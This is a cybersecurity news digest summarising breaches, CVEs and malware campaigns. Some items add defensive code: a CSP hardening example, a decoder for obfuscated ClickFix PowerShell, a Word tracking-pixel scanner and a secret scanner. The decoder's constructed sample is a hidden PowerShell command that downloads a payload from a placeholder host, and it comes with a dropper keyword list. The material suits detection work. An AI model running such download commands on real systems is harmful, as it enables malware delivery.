
Free VPNs Leak Your Data While Claiming Privacy
A study by Mysterium VPN examined 18 of the most downloaded free Android VPN apps and found pervasive privacy violations. Nearly all of the apps embed multiple third‑party trackers and request Android "dangerous" permissions unrelated to VPN functionality, and many connect to hard‑coded servers in sanctioned or heavily surveilled countries. Some also send data over unencrypted HTTP connections, further undermining user security. The study concludes that free VPNs act more as data‑collection platforms than as genuine privacy tools.

Qilin Ransomware Allegedly Breached Chemical Manufacturer Giant Dow Inc
The Qilin ransomware group claims to have breached chemical giant Dow Inc. and has added the company to its Tor data‑leak site. Dow, a $40 billion global manufacturer with 36,000 employees, has not confirmed the intrusion, and no evidence of stolen data has yet been published. The claim follows Qilin’s rapid growth...

It’s a Mystery … Alleged Unpatched Telegram Zero-Day Allows Device Takeover, but Telegram Denies
Zero Day Initiative (ZDI) researcher Michael DePlante of TrendAI disclosed a critical zero‑click vulnerability in Telegram (ZDI‑CAN‑30207) that could allow remote code execution via a crafted animated sticker, earning a CVSS score of 9.8. The flaw reportedly affects the Android and Linux clients and currently...

SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 90
Security Affairs released its Malware Newsletter Round 90, curating roughly 18 recent threat reports spanning nation‑state campaigns, supply‑chain compromises, and novel malware vectors. Highlights include a new Cobra DocGuard infostealer, Iranian actors using Telegram as a command‑and‑control channel, and a supply‑chain attack...

U.S. CISA Adds an Aquasecurity Trivy Flaw to Its Known Exploited Vulnerabilities Catalog
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2026-33634, a 9.3‑severity flaw in Aqua Security's Trivy vulnerability scanner, to its Known Exploited Vulnerabilities (KEV) catalog. The flaw was weaponized on March 19 when attackers used compromised credentials to publish a malicious...

Researchers Uncover WebRTC Skimmer Bypassing Traditional Defenses
Sansec researchers discovered a novel payment skimmer that uses WebRTC DataChannels to load malicious code and exfiltrate payment data. Unlike traditional skimmers that rely on HTTP requests, this technique carries the data over encrypted UDP (DTLS/SCTP) traffic, which the connect‑src directive of Content Security Policy does not govern and which HTTP‑focused network...
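A caveat for defenders, added here and not drawn from the Sansec report: a CSP that only restricts connect-src still leaves RTCPeerConnection available to injected script, because DataChannels are not fetch-style connections. The CSP Level 3 webrtc directive closes that gap for browsers that implement it, so a site that does not legitimately use WebRTC can block it outright. The nginx fragment below contrasts the two headers; the host names are placeholders.

```nginx
# Weak: governs fetch/XHR/WebSocket destinations only. A skimmer that opens
# an RTCPeerConnection and a DataChannel is untouched by connect-src.
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; connect-src 'self' https://api.example.com" always;

# Hardened: the CSP Level 3 'webrtc' directive disables RTCPeerConnection for the
# page entirely. Only add this on sites that do not need WebRTC; browser support
# varies, so treat it as defense in depth alongside script-src and SRI, not as a substitute.
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; connect-src 'self' https://api.example.com; webrtc 'block'" always;
```

Keep only one of the two add_header lines in a real server block; both are shown for comparison. Because the directive is ignored by browsers that predate it, network-side detection of unexpected DTLS handshakes from checkout pages remains worthwhile.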

QNAP Fixed Four Vulnerabilities Demonstrated at Pwn2Own Ireland 2025
QNAP has patched four critical SD‑WAN router vulnerabilities (CVE‑2025‑62843 to CVE‑2025‑62846) that were exploited by Team DDOS at Pwn2Own Ireland 2025, earning a $100,000 bounty. The flaws allowed privilege escalation through physical access, weak LAN authentication, an SQL injection, and...

Pro-Iranian Nasir Security Is Targeting Energy Companies in the Gulf
Resecurity has identified a nascent Iran‑linked cybercriminal group, Nasir Security, that is systematically targeting energy firms across the Gulf through supply‑chain compromises. The attackers focus on engineering, construction and safety vendors, stealing authentic contracts, risk‑assessment reports and schematics via business‑email‑compromise...

French Aircraft Carrier Charles De Gaulle Tracked via Strava Activity in OPSEC Failure
Le Monde reported that a French Navy officer unintentionally disclosed the real‑time position of the aircraft carrier Charles de Gaulle by uploading a public Strava run from the deck. The data showed the carrier sailing in the Mediterranean near Cyprus...

CVE-2026-3888: Ubuntu Desktop 24.04+ Vulnerable to Root Exploit
Qualys discovered CVE-2026-3888, a high‑severity local privilege escalation flaw in Ubuntu Desktop 24.04 and later. The vulnerability abuses a race window between systemd‑tmpfiles and snap‑confine, allowing an unprivileged local user to gain root, although the exploitable window only opens after a wait of 10 to 30 days. It carries a CVSS score of 7.8...

From Windows to macOS: ClickFix Attacks Shift Tactics with ChatGPT-Based Lures
ClickFix social‑engineering campaigns, once Windows‑focused, have pivoted to macOS by using ChatGPT‑related lures. Early November 2025 attacks tricked users into copying obfuscated Terminal commands that installed the MacSync infostealer. By December, attackers masqueraded as legitimate ChatGPT conversations and fake GitHub...

U.S. CISA Adds a Flaw in Wing FTP Server to Its Known Exploited Vulnerabilities Catalog
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the Wing FTP Server flaw CVE‑2025‑47813 to its Known Exploited Vulnerabilities (KEV) catalog. The vulnerability, rated 4.3 on the CVSS scale, discloses the full local installation path when an oversized...

US and European Authorities Disrupt socksEscort Proxy Service Tied to AVrecon Botnet
Law enforcement agencies in the US and Europe dismantled the SocksEscort proxy service, which leveraged the AVrecon botnet to hijack roughly 369,000 routers and IoT devices across 163 countries. The operation, dubbed Operation Lightning, seized 34 domains and 23 servers,...

Beyond File Servers: Securing Unstructured Data in the Era of AI
Legacy file servers still host regulated folders, but most business workflows now live in collaborative documents, code repositories, chat platforms, and AI assistants. Traditional security tools focus on scanning static file locations, leaving gaps where data is created, shared, and...

Apple Issues Emergency Fixes for Coruna Flaws in Older iOS Versions
Apple has issued emergency security updates for legacy iPhone and iPad models, releasing iOS 15.8.7 and iPadOS 16.7.15. The patches address four critical CVEs tied to the Coruna (CryptoWaters) exploit kit, which targets iOS 13.0‑17.2.1. Coruna comprises 23 exploits and...

ENISA Technical Advisory on Secure Package Managers: Essential DevSecOps Guidance
ENISA has published its first Technical Advisory on Secure Package Managers (v1.1), incorporating feedback from 15 stakeholders and experts. The document details common supply‑chain risks of third‑party dependencies and offers concrete practices for selecting, integrating, monitoring, and mitigating vulnerabilities across...

Bell Ambulance Data Breach Impacted over 238,000 People
Bell Ambulance, a U.S. emergency medical services provider, confirmed a data breach that exposed personal, financial, and health information of approximately 238,000 individuals. The breach, detected on February 13, 2025, was linked to the Medusa ransomware group, which claimed to...

Law Enforcement Disrupted Tycoon 2FA Phishing-as-a-Service Platform
An operation led by Microsoft and Europol, with law enforcement support, dismantled the Tycoon 2FA phishing‑as‑a‑service platform, which was responsible for tens of millions of fraudulent emails each month. By mid‑2025 the service accounted for roughly 62% of all phishing attempts blocked by Microsoft,...

Critical Nginx UI Flaw CVE-2026-27944 Exposes Server Backups
Security researchers have disclosed a critical vulnerability in Nginx UI (CVE‑2026‑27944) with a CVSS score of 9.8. The flaw allows unauthenticated users to call the /api/backup endpoint, retrieve a full server backup, and decrypt it using an AES‑256 key exposed...

Microsoft Warns of ClickFix Campaign Exploiting Windows Terminal to Deliver Lumma Stealer
Microsoft Defender uncovered a new ClickFix campaign that leverages the Windows+X → I shortcut to launch Windows Terminal instead of the traditional Run dialog. Attackers persuade users to paste a hex‑encoded and XOR‑obfuscated PowerShell command, which downloads a renamed 7‑Zip payload and ultimately...
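When a pasted ClickFix blob turns up in Terminal history or clipboard telemetry, the first analyst task is to recover the command behind the hex and XOR layers without knowing the key. The decoder below is an added example, not Microsoft's tooling or the campaign's real payload: it assumes the layering is hex(plaintext XOR single-byte key), brute-forces all 256 keys, and picks the candidate that is fully printable and contains PowerShell keywords. The sample blob is constructed from a benign command with an assumed key.

```python
"""Brute-force a single-byte XOR key over a hex-encoded ClickFix-style payload.

Added example (not Microsoft's code or the campaign's actual payload). Assumes
the obfuscation is hex(text XOR key) with a single-byte key; the sample below
is constructed for this demonstration.
"""
import string

# Substrings an analyst expects in a PowerShell dropper (assumed heuristic list)
PS_KEYWORDS = ("powershell", "iex", "invoke-expression", "downloadstring",
               "-enc", "-w hidden", "frombase64string", "invoke-webrequest", "iwr ")
PRINTABLE = set(bytes(string.printable, "ascii"))


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key (symmetric, so also decodes)."""
    return bytes(b ^ key for b in data)


def score(candidate: bytes) -> int:
    """0 if any byte is non-printable; otherwise 1 plus the number of keyword hits."""
    if not candidate or any(b not in PRINTABLE for b in candidate):
        return 0
    text = candidate.decode("ascii").lower()
    return 1 + sum(text.count(k) for k in PS_KEYWORDS)


def decode_hex_xor(hex_blob: str):
    """Return (key, plaintext) for the best-scoring key, or (None, None) if no
    candidate is both printable and contains at least one PowerShell keyword."""
    raw = bytes.fromhex("".join(hex_blob.split()))
    best_key, best_text, best_score = None, None, 0
    for key in range(256):
        cand = xor_bytes(raw, key)
        s = score(cand)
        if s > best_score:
            best_key, best_text, best_score = key, cand.decode("ascii"), s
    if best_score < 2:  # printable but keyword-free: not confident enough to report
        return None, None
    return best_key, best_text


def make_sample(command: str, key: int) -> str:
    """Constructed lure: obfuscate a command the way the campaign is described."""
    return xor_bytes(command.encode("ascii"), key).hex()


SAMPLE_KEY = 0x5A  # assumed; the page does not give the real campaign's key
SAMPLE_CMD = ('powershell -w hidden -c "iwr http://example.invalid/update.bin '
              '-OutFile $env:TEMP\\7z.exe"')
SAMPLE_HEX = make_sample(SAMPLE_CMD, SAMPLE_KEY)

if __name__ == "__main__":
    key, plain = decode_hex_xor(SAMPLE_HEX)
    print(f"key=0x{key:02x} -> {plain}")
```

The printable-only filter discards most wrong keys immediately; the keyword count breaks ties among the few keys that happen to map every byte into ASCII. Multi-byte keys need a longer search, but the same scoring function carries over.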

Automate or Orchestrate? Implementing a Streamlined Remediation Program to Shorten MTTR
Security teams are racing to cut Mean Time to Remediate (MTTR), which averages 4.5 months for critical flaws. The article clarifies the distinction between automation—single‑task, high‑speed fixes—and orchestration—coordinated, multi‑tool workflows for complex exposures. It proposes a routing engine that directs...

Oracle EBS 2025 Campaign Impacts Madison Square Garden, Sensitive Data Leaked
Madison Square Garden confirmed a data breach tied to the 2025 Oracle E‑Business Suite hacking campaign. The Cl0p ransomware group exploited a zero‑day vulnerability (CVE‑2025‑61882) to steal over 210 GB of archived files, including employee payroll and Social Security numbers. MSG...

CVE-2025-64328 Exploitation Impacts 900 Sangoma FreePBX Instances
Around 900 Sangoma FreePBX installations were compromised after attackers leveraged CVE-2025-64328, a post‑authentication command‑injection flaw in the Endpoint Manager module. The vulnerability, rated 8.6 on the CVSS scale, allowed malicious code execution and led to the deployment of the EncystPHP...

Iran's Internet Near-Totally Blacked Out Amid US, Israeli Strikes
Iran experienced a near‑total internet blackout on Feb. 28, 2026, as U.S. and Israeli strikes hit the country. Network monitoring by NetBlocks showed national connectivity dropping to roughly 4% of normal levels, while Cloudflare reported traffic falling to effectively zero...

How AI Aids Incident Response: Why Humans Alone Cannot Do IR Efficiently
Incident response traditionally relies on manual log correlation, alert validation, and report drafting, consuming 10‑20 minutes per case and often days for complex attacks. AI‑enabled platforms now ingest telemetry from SIEM, EDR, identity, and cloud sources the moment an alert...

12 Million Exposed .env Files Reveal Widespread Security Failures
Mysterium VPN’s research uncovered more than 12 million IP addresses serving publicly accessible .env‑style files, leaking credentials such as database passwords, API keys, and JWT signing secrets. The United States leads the exposure count with roughly 2.8 million IPs, while Japan, Germany,...

SolarWinds Patches Four Critical Serv-U Flaws Enabling Root Access
SolarWinds has issued patches for four critical Serv‑U vulnerabilities (CVE‑2025‑40538, 40539, 40540, 40541), each scoring 9.1 on the CVSS scale. The flaws—broken access control, two type‑confusion bugs, and an IDOR issue—enable remote code execution that can grant attackers full root...

VMware Aria Operations Flaws Could Enable Remote Attacks
Broadcom released security updates fixing three critical flaws in VMware Aria Operations, including a remote command injection (CVE-2026-22719) with a CVSS score of 8.1, a stored cross‑site scripting issue (CVE-2026-22720) rated 8.0, and a privilege‑escalation bug (CVE-2026-22721) scored 6.2. The...

Operation MacroMaze: APT28 Exploits Webhooks for Covert Data Exfiltration
Operation MacroMaze, a Russia‑linked APT28 campaign, targeted Western and Central European organizations from September 2025 to January 2026. The attackers embedded an INCLUDEPICTURE field in Word documents that fetched a JPG from webhook.site, creating a covert tracking pixel and confirming document opening....
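The INCLUDEPICTURE trick leaves a clear artifact in the document itself: the field instruction, with its URL, sits in word/document.xml. The scanner below is an added example and not part of the MacroMaze reporting; it builds a minimal .docx in memory (a constructed sample, with a made-up webhook.site path), extracts both complex fields (fldChar/instrText runs) and simple fields (fldSimple), and reports INCLUDEPICTURE URLs whose host is not on an allow-list. Run it over a mail gateway's attachment queue to catch the tracking pixel before anyone opens the file.

```python
"""Flag Word documents whose INCLUDEPICTURE fields fetch images from external hosts.

Added example, not part of the MacroMaze report. Builds a minimal .docx in
memory (constructed sample) and scans word/document.xml for field codes.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
URL_RE = re.compile(r'INCLUDEPICTURE\s+"?(https?://[^"\s\\]+)', re.IGNORECASE)


def field_codes(document_xml: bytes):
    """Yield every field instruction string in the document body.

    Word stores complex fields as <w:instrText> runs between fldChar begin/end
    markers, and simple fields as <w:fldSimple w:instr="..."/>. instrText runs
    belonging to one field are concatenated here.
    """
    root = ET.fromstring(document_xml)
    for fs in root.iter(f"{{{W_NS}}}fldSimple"):
        yield fs.get(f"{{{W_NS}}}instr", "")
    buf, inside = [], False
    for el in root.iter():  # document order
        if el.tag == f"{{{W_NS}}}fldChar":
            kind = el.get(f"{{{W_NS}}}fldCharType")
            if kind == "begin":
                buf, inside = [], True
            elif kind == "end" and inside:
                yield "".join(buf)
                inside = False
        elif inside and el.tag == f"{{{W_NS}}}instrText":
            buf.append(el.text or "")


def external_picture_urls(docx_bytes: bytes, allowed_hosts=()):
    """Return INCLUDEPICTURE URLs whose host is not in allowed_hosts."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        xml_bytes = zf.read("word/document.xml")
    hits = []
    for code in field_codes(xml_bytes):
        for url in URL_RE.findall(code):
            host = urlparse(url).hostname or ""
            if host not in allowed_hosts:
                hits.append(url)
    return hits


def build_sample_docx(field_url: str) -> bytes:
    """Constructed document: one complex INCLUDEPICTURE field split across two
    instrText runs (as Word often writes it) plus a harmless fldSimple DATE."""
    doc = f'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:document xmlns:w="{W_NS}"><w:body><w:p>
<w:r><w:fldChar w:fldCharType="begin"/></w:r>
<w:r><w:instrText xml:space="preserve"> INCLUDEPICTURE </w:instrText></w:r>
<w:r><w:instrText xml:space="preserve">"{field_url}" \\d </w:instrText></w:r>
<w:r><w:fldChar w:fldCharType="separate"/></w:r>
<w:r><w:fldChar w:fldCharType="end"/></w:r>
<w:fldSimple w:instr=" DATE \\@ &quot;d MMMM yyyy&quot; "><w:r><w:t>1 January 2026</w:t></w:r></w:fldSimple>
</w:p></w:body></w:document>'''
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")  # stub; the scan does not read it
        zf.writestr("word/document.xml", doc)
    return buf.getvalue()


# Constructed path: the UUID is a placeholder, not an indicator from the campaign
SAMPLE_URL = "https://webhook.site/00000000-0000-0000-0000-000000000000/pixel.jpg"
SAMPLE_DOCX = build_sample_docx(SAMPLE_URL)

if __name__ == "__main__":
    for url in external_picture_urls(SAMPLE_DOCX):
        print("external INCLUDEPICTURE:", url)
```

Splitting the instruction across runs is why the scanner concatenates instrText between begin and end rather than matching each run on its own; a single-run regex would miss the URL in the sample. The same walk also surfaces INCLUDETEXT and HYPERLINK fields if you widen the regex.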

SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 85
The Security Affairs Malware Newsletter Round 85 aggregates the latest research and incident reports on global malware threats. Highlights include new Android threats like Ninja Browser, Lumma Infostealer, PromptSpy and Phantom Trojans, a surge in ATM jackpotting across the U.S., and...

U.S. CISA Adds RoundCube Webmail Flaws to Its Known Exploited Vulnerabilities Catalog
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two critical RoundCube Webmail vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. The flaws—CVE-2025-49113, a deserialization bug with a 9.9 CVSS score, and CVE-2025-68461, an SVG‑based XSS issue scoring 7.2—target...

CISA Alerts to Critical Auth Bypass CVE-2026-1670 in Honeywell CCTVs
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an alert for a critical authentication‑bypass vulnerability (CVE‑2026‑1670) in several Honeywell CCTV models, receiving a CVSS score of 9.8. The flaw lets unauthenticated attackers change the recovery email address, enabling...

French Ministry Confirms Data Access to 1.2 Million Bank Accounts
The French Economy Ministry disclosed that a hacker used stolen government credentials to view data from 1.2 million bank accounts across the country. The breach, detected in late January, exposed personal details such as names, addresses, account numbers and, in some...

Poorly Crafted Phishing Campaign Leverages Bogus Security Incident Report
A phishing campaign leveraged a fake PDF security incident report hosted on Amazon S3 to intimidate MetaMask users into enabling two‑factor authentication. The PDF, created with ReportLab, contains no malicious code but mimics an official security alert. Researchers noted the...

Encrypted RCS Messaging Support Lands in Apple’s iOS 26.4 Developer Build
Apple introduced end‑to‑end encrypted Rich Communication Services (RCS) messaging in the iOS 26.4 developer beta, extending the feature to iPadOS, macOS and watchOS in future updates. The encryption is currently limited to iPhone‑to‑iPhone conversations and depends on carrier support, with a...

Critical Fortinet FortiClientEMS Flaw Allows Remote Code Execution
Fortinet disclosed a critical vulnerability (CVE‑2026‑21643) in its FortiClientEMS product, earning a CVSS 9.1 rating. The flaw is an unauthenticated SQL‑injection that allows remote code execution via crafted HTTP requests. Only FortiClientEMS 7.4.4 is affected, and Fortinet recommends upgrading to...

Attackers Abuse SolarWinds Web Help Desk to Install Zoho Agents and Velociraptor
On February 7, 2026, Huntress confirmed active exploitation of multiple critical vulnerabilities in SolarWinds Web Help Desk (WHD), including CVE‑2025‑40551 and CVE‑2025‑26399, which permit arbitrary code execution via untrusted deserialization. Attackers leveraged the flaws to install a Zoho ManageEngine remote‑management...

SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 83
Security Affairs released its Malware Newsletter Round 83, curating the latest research and incident reports across the global malware landscape. The edition spotlights 341 malicious capabilities uncovered in the ClawHavoc bot, APT28’s exploitation of CVE‑2026‑21509, and Amaranth‑Dragon’s weaponization of CVE‑2025‑8088 for...

Nearly 5 Million Web Servers Found Exposing Git Metadata – Study Reveals Widespread Risk of Code and Credential Leaks
A 2026 Mysterium VPN study uncovered nearly 5 million public web servers exposing Git repository metadata, with over 250,000 .git/config files leaking active deployment credentials. The misconfigurations allow attackers to reconstruct source code, steal secrets, and potentially gain cloud access. Affected...
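Both this Git metadata finding and the .env exposure item above come down to the same failure: a web root serving dotfiles, and the secrets inside them being live. The scanner below is an added example serving both items; it is not Mysterium VPN's tooling. Given a file path and its body, it parses .env-style KEY=VALUE lines and flags secret-bearing keys with non-placeholder values, and parses .git/config for remote URLs that embed user:password or token credentials. The key-name heuristics and placeholder list are assumptions, and the two inputs are constructed samples with fake credentials.

```python
"""Scan files a web root should never serve (.env, .git/config) for live secrets.

Added example covering the .env and .git/config exposure findings; not
Mysterium VPN's tooling. Heuristics are assumed; inputs below are constructed.
"""
import re
from urllib.parse import urlparse

# Key-name fragments that usually carry a secret (assumed heuristic, case-insensitive)
SECRET_KEY_HINTS = ("PASSWORD", "PASSWD", "SECRET", "TOKEN", "API_KEY", "PRIVATE_KEY", "JWT")
PLACEHOLDERS = {"", "changeme", "xxx", "your_key_here", "null", "none"}
ENV_LINE = re.compile(r'^\s*(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*?)\s*$')
REMOTE_HDR = re.compile(r'^\[remote\s+"([^"]+)"\]$')


def _unquote(value: str) -> str:
    """Strip matching quotes; otherwise drop a trailing ' # comment'."""
    if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
        return value[1:-1]
    return value.split(" #", 1)[0].strip()


def scan_env(text: str):
    """Return (key, value) pairs from .env content whose key looks secret-bearing."""
    hits = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = ENV_LINE.match(line)
        if not m:
            continue
        key, value = m.group(1), _unquote(m.group(2))
        if any(h in key.upper() for h in SECRET_KEY_HINTS) and value.lower() not in PLACEHOLDERS:
            hits.append((key, value))
    return hits


def scan_git_config(text: str):
    """Return (remote_name, url) for remotes whose URL embeds credentials."""
    hits, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = REMOTE_HDR.match(line)
        if m:
            section = m.group(1)
            continue
        if line.startswith("["):
            section = None  # some other section, e.g. [core] or [branch "..."]
            continue
        if section and line.lower().startswith("url") and "=" in line:
            url = line.split("=", 1)[1].strip()
            p = urlparse(url)
            # user:password in an http(s) URL, or a bare token used as the username
            if p.password or (p.username and p.scheme in ("http", "https")):
                hits.append((section, url))
    return hits


def scan_exposed_file(path: str, body: str):
    """Dispatch on file name; returns findings as (kind, detail) tuples."""
    name = path.rsplit("/", 1)[-1]
    if name == ".env" or name.startswith(".env."):
        return [("env-secret", f"{k}={v}") for k, v in scan_env(body)]
    if path.endswith(".git/config"):
        return [("git-remote-credential", f"{r}: {u}") for r, u in scan_git_config(body)]
    return []


# Constructed samples; none of these values are real credentials
SAMPLE_ENV = """# Laravel-style .env
APP_NAME="Acme"
APP_DEBUG=true
DB_HOST=127.0.0.1
DB_PASSWORD='s3cr3t-pa55'
JWT_SECRET=base64:ZmFrZS1rZXktZm9yLWRlbW8=
AWS_SECRET_ACCESS_KEY=changeme
STRIPE_API_KEY=sk_test_constructed123 # rotate me
"""

SAMPLE_GIT_CONFIG = """[core]
\trepositoryformatversion = 0
[remote "origin"]
\turl = https://deploy:ghp_constructedtoken@github.com/acme/shop.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
[remote "mirror"]
\turl = git@gitlab.com:acme/shop.git
"""

if __name__ == "__main__":
    for f in scan_exposed_file("/var/www/html/.env", SAMPLE_ENV):
        print(f)
    for f in scan_exposed_file("/var/www/html/.git/config", SAMPLE_GIT_CONFIG):
        print(f)
```

Findings from either scanner mean rotate first, then fix serving: the credential is already public. On the serving side, a catch-all rule such as nginx's `location ~ /\.(?!well-known) { deny all; }` blocks every dotfile and directory while leaving /.well-known reachable.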

Microsoft: Info-Stealing Malware Expands From Windows to macOS
Microsoft has observed a rapid rise in information‑stealing malware targeting macOS, a shift from its traditional Windows focus. Since late 2025, threat actors have deployed macOS‑specific stealers such as DigitStealer, MacSync and Atomic macOS Stealer, often written in Python and...

SmarterTools Patches Critical SmarterMail Flaw Allowing Code Execution
SmarterTools released build 9511 to remediate two critical SmarterMail flaws, CVE-2026-24423 and CVE-2026-23760, each scoring 9.3 on the CVSS scale. The first vulnerability allowed unauthenticated attackers to execute arbitrary OS commands via the ConnectToHub API, while the second bypassed authentication...

Google Targets IPIDEA in Crackdown on Global Residential Proxy Networks
Google and partners disrupted the IPIDEA residential proxy network, one of the world’s largest, by taking down domains, sharing intelligence, and enforcing Play Protect. The operation removed SDKs embedded in millions of Android, Windows, iOS, and WebOS apps, sharply reducing...

Emergency Microsoft Update Fixes In-the-Wild Office Zero-Day
Microsoft released emergency out‑of‑band updates to remediate CVE‑2026‑21509, a zero‑day flaw actively exploited in the wild. The vulnerability bypasses OLE security controls in Office 2016 through 2024 and Microsoft 365 Apps, allowing attackers to execute malicious code via crafted Office...

Nike Is Investigating a Possible Data Breach, After WorldLeaks Claims
Nike announced it is probing a potential cyber incident after the WorldLeaks group claimed to have accessed and exfiltrated roughly 1.4 TB of company data. The hacker collective, which evolved from the Hunters International ransomware gang, posted the alleged breach on...

SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 81
Security Affairs’ Malware Newsletter Round 81 curates the latest threats and research across the malware landscape. Highlights include the emergence of AI‑generated malware frameworks such as VoidLink, sophisticated evasion tactics like PDFSIDER’s DLL side‑loading, and supply‑chain abuse via a malicious...

U.S. CISA Adds a Flaw in Broadcom VMware vCenter Server to Its Known Exploited Vulnerabilities Catalog
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the critical VMware vCenter Server flaw CVE-2024-37079 to its Known Exploited Vulnerabilities (KEV) catalog. The heap‑overflow bug in the DCERPC implementation carries a CVSS score of 9.8 and enables remote...

Zoom Fixed Critical Node Multimedia Routers Flaw
Zoom released security patches that fix a critical command‑injection flaw (CVE‑2026‑22844) in its Node Multimedia Routers (MMR). The vulnerability, rated 9.9 on the CVSS scale, could let a meeting participant execute arbitrary code on affected MMRs. Versions prior to 5.2.1716.0...

Crooks Impersonate LastPass in Campaign to Harvest Master Passwords
LastPass disclosed an active phishing campaign that began around January 19, 2026, in which attackers impersonated the service with urgent‑maintenance emails to harvest master passwords. The messages contain links to an Amazon S3‑hosted page that redirects to a counterfeit LastPass...

Hacktivists Hijacked Iran's State TV to Air Anti-Regime Messages and an Appeal to Protest From Reza Pahlavi
On Jan 18, 2026, hackers hijacked Iranian state TV channels carried on the Badr satellite, broadcasting a ten‑minute anti‑regime video featuring exiled Crown Prince Reza Pahlavi. The clip urged citizens to keep protesting and called on the military to join demonstrators. The intrusion occurred amid a...

Data Breach at Canada’s Investment Watchdog Canadian Investment Regulatory Organization Impacts 750,000 People
Canada’s self‑regulatory body, the Canadian Investment Regulatory Organization (CIRO), disclosed a data breach affecting roughly 750,000 individuals. The breach stemmed from a phishing attack in August 2025 that allowed threat actors to copy a limited set of investigative, compliance and...